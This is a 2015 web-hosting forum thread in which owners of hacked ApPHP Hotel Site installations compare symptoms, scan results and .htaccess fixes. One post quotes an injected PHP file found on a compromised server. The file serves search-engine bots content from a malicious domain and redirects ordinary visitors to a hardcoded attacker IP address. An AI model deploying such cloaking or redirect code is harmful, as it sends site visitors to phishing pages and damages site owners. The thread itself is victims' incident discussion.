[SOLVED] Information about security updates?

Discuss everything related to PHP Hotel Site. All versions. Any questions related to the PHP Hotel Site developing or using should be posted to this forum.

Moderators: ne_moj, zewa

bleumarine
Junior
Junior
Posts: 24
Joined: Apr 21st, '11, 11:44

Re: Information about security updates?

Postby bleumarine » Mar 29th, '15, 20:50

Hello

This is a very big problem . But i think all the websites hacked are on Shared Hosting accounts and they are not only Hotel Script !

I checked from the list published by gygy42 some of the websites are not using Hotel Site script at all , and all of them have injected folder with some files redirecting to malicious pages or fake websites , the frustrated thing is that most of these websites webmasters or admins are not aware about this , and they wait until the hosting company close the website .

We wait for the ApPHP security stuff to reply this post , until that and in my experience i don't think the problem is related to the Hotel Site script but to hosting account bad configuration ( .htaccess , or chmod etc...)

bleumarine
Junior
Junior
Posts: 24
Joined: Apr 21st, '11, 11:44

Re: Information about security updates?

Postby bleumarine » Mar 30th, '15, 00:44

Hello everyone

As i told you in my previous post , the security problem is not related to Hotel Script , but to the shared hosting account , i am not defending the script but as i am familiar with this script and use it since 2011 i am sure such problem is related to hosting accounts and servers .

To prove this i did some researches on "online website security check tools" to check the security of the website's given in the list published by gyy42.
I found one website that offers free and paid services , and i chose free service just to be sure about the source of the problem you encountered (and that i may encounter as i am a user of this script too).

I share here the tool i used : http://sitecheck.sucuri.net/ ( I am not advertising the website but you can use it just to make sure about what i said in my previous post or you can find other website with other tools free or paid )

Then in the list published by gygy42 i chose the last website ( http://www.hotelmargherita.it ) to scan and see what is exactly the problem with it's security because this website use the Hotel Script .

After scan ( You can also scan yourself this website or your own website and get useful results ) i got the results in the attachment

From the printscreen we can read in red color the issues detected .

For this website the problem is : Outdated Web Server Apache Found which means Vulnerabilities on Apache 2.4 that you can find in official website of Apache http://httpd.apache.org/security/vulnerabilities_24.html

The status of this issue needs an "Immediate Action is Recommended" as they said in the sucuri website.

Now i think it is clear the problem is related to the hosting account and not to the Hotel Script .

Finally if someone can contact the websites owners or webmasters for the list published in the posts ( like http://www.hotelmargherita.it ) to inform them and share the information with them .

I will wait for ApPHP security stuff to reply first , then if you need i can write a small tutorial on how to secure your website especially when using shared hosting , and i will focus on ApPHP scripts to share my experience with you , of course if you wish and if i got permission from Administrator .

NB : I tried to attach PNG images but i couldn't that's why i shared them using a free webservice

Image

Image

gygy42
Junior
Junior
Posts: 24
Joined: Dec 5th, '12, 13:42

Re: Information about security updates?

Postby gygy42 » Mar 30th, '15, 10:52

Hi thanks,
it's funny it's exactly the same test I have done.
So if it is a APACHE server issue it would be great, was thinking of MYSQL...
I'm a little bit aware of CHMOD and .htaccess but a small tuto wouldn't harm!

paavon
Newbie
Newbie
Posts: 5
Joined: Dec 20th, '11, 17:28

Re: Information about security updates?

Postby paavon » Mar 30th, '15, 11:38

bleumarine wrote:
From the printscreen we can read in red color the issues detected .

For this website the problem is : Outdated Web Server Apache Found which means Vulnerabilities on Apache 2.4 that you can find in official website of Apache http://httpd.apache.org/security/vulnerabilities_24.html

The status of this issue needs an "Immediate Action is Recommended" as they said in the sucuri website.

Now i think it is clear the problem is related to the hosting account and not to the Hotel Script .



Its not accurate way detect if Apache or PHP vulnerabilities just by version number what those servers are replying. Because most distributions (and probably cpanel too which is very popular using their own apache package?) dont everytime roll latest version with security updates, they are backporting security updates for older version. For example, currently my site (where pages are temporarily) runs with version 2.2.15 (httpd-2.2.15-39.el6 says package manager) and 2.2.15 version is for sure with lot of vulnerabilities but i have latest updates from CentOS (RedHat) so where those security holes are fixed. And most sites really dont want share too much what apache says, thats why its good idea generally change littlebit ServerTokens settings.

https://rhn.redhat.com/errata/RHBA-2014-1386.html for example this one i have installed.

Version should be checked from example by using package management tools or vendors (centos, cpanel, whatever) own security announces, not just by upstreams (apache, php) announces.

For example some enterprise class distros, like Red Hat offer 10 years life cycle for their distribution and they really cant always have latest version of every software, it would break so much things and causing lot of other problems so its much easier and not breaking system with just backporting patches to older version. So if you want always latest version, those enterprise distros (or long term supported, like its sometimes nowadays called, like Ubuntu LTS) are not good choice.

You can read more about "backporting" from https://access.redhat.com/security/updates/backporting

Their solution is offer newer version thru Red Hat Software Collections

I dont have any idea which version our hosting company used, but they said that it wasnt problems with their security and like i said, every virtualhost are isolated from each other, im not sure how its done but some container/jail/chroot whatever and i didnt have anything else installed there than hotel site (i gave access to those files for hotel site support staff while filling ticket, so they can check if needed). Dont know about those other announces but im pretty sure that mine is highly connected to Hotel Site. That why i was curious if there is any known security hole.

I was thinking could it be some malicious order (atleast didnt find anything), feedback or something? Site have been running now couple days, i see some connection attempts to injected files (which are removed) but site seems to be unharmed so far (no any filechanges lately). I wrote script monitoring file changes and so far everything is okey but littlebit scared still.

adebagus
Junior
Junior
Posts: 11
Joined: Mar 21st, '11, 13:56

Re: Information about security updates?

Postby adebagus » Mar 31st, '15, 14:36

sucuri.PNG
Hosted in godaddy.com
sucuri.PNG (62.47 KiB) Viewed 2178 times

Hello All,
My site was compromised too. I just aware when I check my email and found in the spam box email from Google saying detect a phishing activity from the site. I immediately check using ftp and found several directory folder are randomly created with a bunch of php files as well as in the root directory. One folder even contains 93 php files. I deleted all suspicious files & directories. I am not sure if my site already clean or not.
As suggested in this forum to check using sucuri sitecheck and found my site is still infected. Do not know what to do now. I host my site in GoDaddy. Wonder why such big name not cautious with security. I haven't send them an email yet though.
Here is one of the php code

Code: Select all

<?php $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;

if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
    $isbot = 1;
   }

if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
    $isbot = 1;
}

if ($isbot)
{

$url = "http://20150327test.fefnjefb.in/prsfxeyqrqeiunobznxgckyj";
$options = array(
  'http'=>array(
    'method'=>"GET",
    'header'=>"Accept-language: en\r\n" .
              "Cookie: foo=bar\r\n" .  // check function.stream-context-create on php.net
              "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."\r\n" // i.e. An iPad
  )
);
$context = stream_context_create($options);
$html = file_get_contents($url, false, $context);
echo $html;
}

if(!@$isbot)
{
//

$s = dirname($_SERVER['PHP_SELF']);
if ($s == '\\' | $s == '/') {$s = ('');} 
$s = $_SERVER['SERVER_NAME'] . $s;

header("Location: http://173.236.65.24/input/?mark=20150327test-$s&url=http://20150327test.fefnjefb.in/prsfxeyqrqeiunobznxgckyj");
//header("Location: http://20150327test.fefnjefb.in/prsfxeyqrqeiunobznxgckyj");
exit;
}

?>

gygy42
Junior
Junior
Posts: 24
Joined: Dec 5th, '12, 13:42

Re: Information about security updates?

Postby gygy42 » Mar 31st, '15, 17:04

important check the links!
Just go on securi sitecheck and click on web details.
You will see if you still have some backlink (in my case it was the template default.php)
By my side I just re-uploaded completely and bow I'm looking to secure using CHMOD and the right .htacces
If someone have a good one just let it now here!

MelG13
Newbie
Newbie
Posts: 1
Joined: Apr 10th, '15, 08:10

Re: Information about security updates?

Postby MelG13 » Apr 10th, '15, 08:56

Hi All! Two sites of mine are compromised too - one BusinessDirectory Site (some infected new php files in the root plus one new "info" folder incl. one php file) and one MicroBlog Site ("only" one new infected license.php file in the root). The sites are hosted via provider. I´ve deleted the new files and made the Sucuri check and they are fine, but could anybody figure out the problem? I want to prevent the vulnerability also for the future of course. Thanks!

sala_tk
Junior
Junior
Posts: 18
Joined: Dec 16th, '12, 03:04

Re: Information about security updates?

Postby sala_tk » May 20th, '15, 22:59

Hi Administrator,

I also facing to the same problem that the stranger placed php scripts and some other files in many directories and sent a lot of spam e-mail out everyday. I searched those strange files out from the infected directories but afterward it happened in other directories.

I tried to protect direct script by put .htacces file with the following command;

<Filesmatch ".(php)$">
order deny,allow
deny from all
</Filesmatch>

It could help in some directories those do not have any php script inside to run stranger php script from the directory, but some directory contain system php script I can not
put .htaccess file to protect otherwise it can not run system php script.

Please kindly advise how to prevent such of these strangers php script to run and how to prevent the stranger to place such of these unwanted script in Hotel Suite System.

P.S. These problem happened with both V. 4.03 & 4.29 even though I changed the password of the host user but it could not help.

Looking forward for your kind assistance.

cancunplaza
Master
Master
Posts: 146
Joined: Nov 6th, '10, 22:23
Location: Cancun Mx
Contact:

Re: Information about security updates?

Postby cancunplaza » May 23rd, '15, 12:37

Same problem!

I had to change from server, because of this.

I hope the admin give us an answer or they make an update of the security if is the case.

Thanks

finalcreations
Newbie
Newbie
Posts: 4
Joined: Dec 17th, '10, 17:36

Re: Information about security updates?

Postby finalcreations » May 23rd, '15, 15:49

My website was hacked this morning too.
Seems a bit of a coincidence everyone's website has the same files attached.
I have over 200 other websites hosted on multiple servers and it is only the one with ApPHP Hotel script being hacked.

I wish they would fix this security hole because this happened on the last bank holiday too!!
I would imagine in the next few days there will be even more customers having the same problem.


Return to “ApPHP HotelSite / uHotelBooking Talk {developers/users}”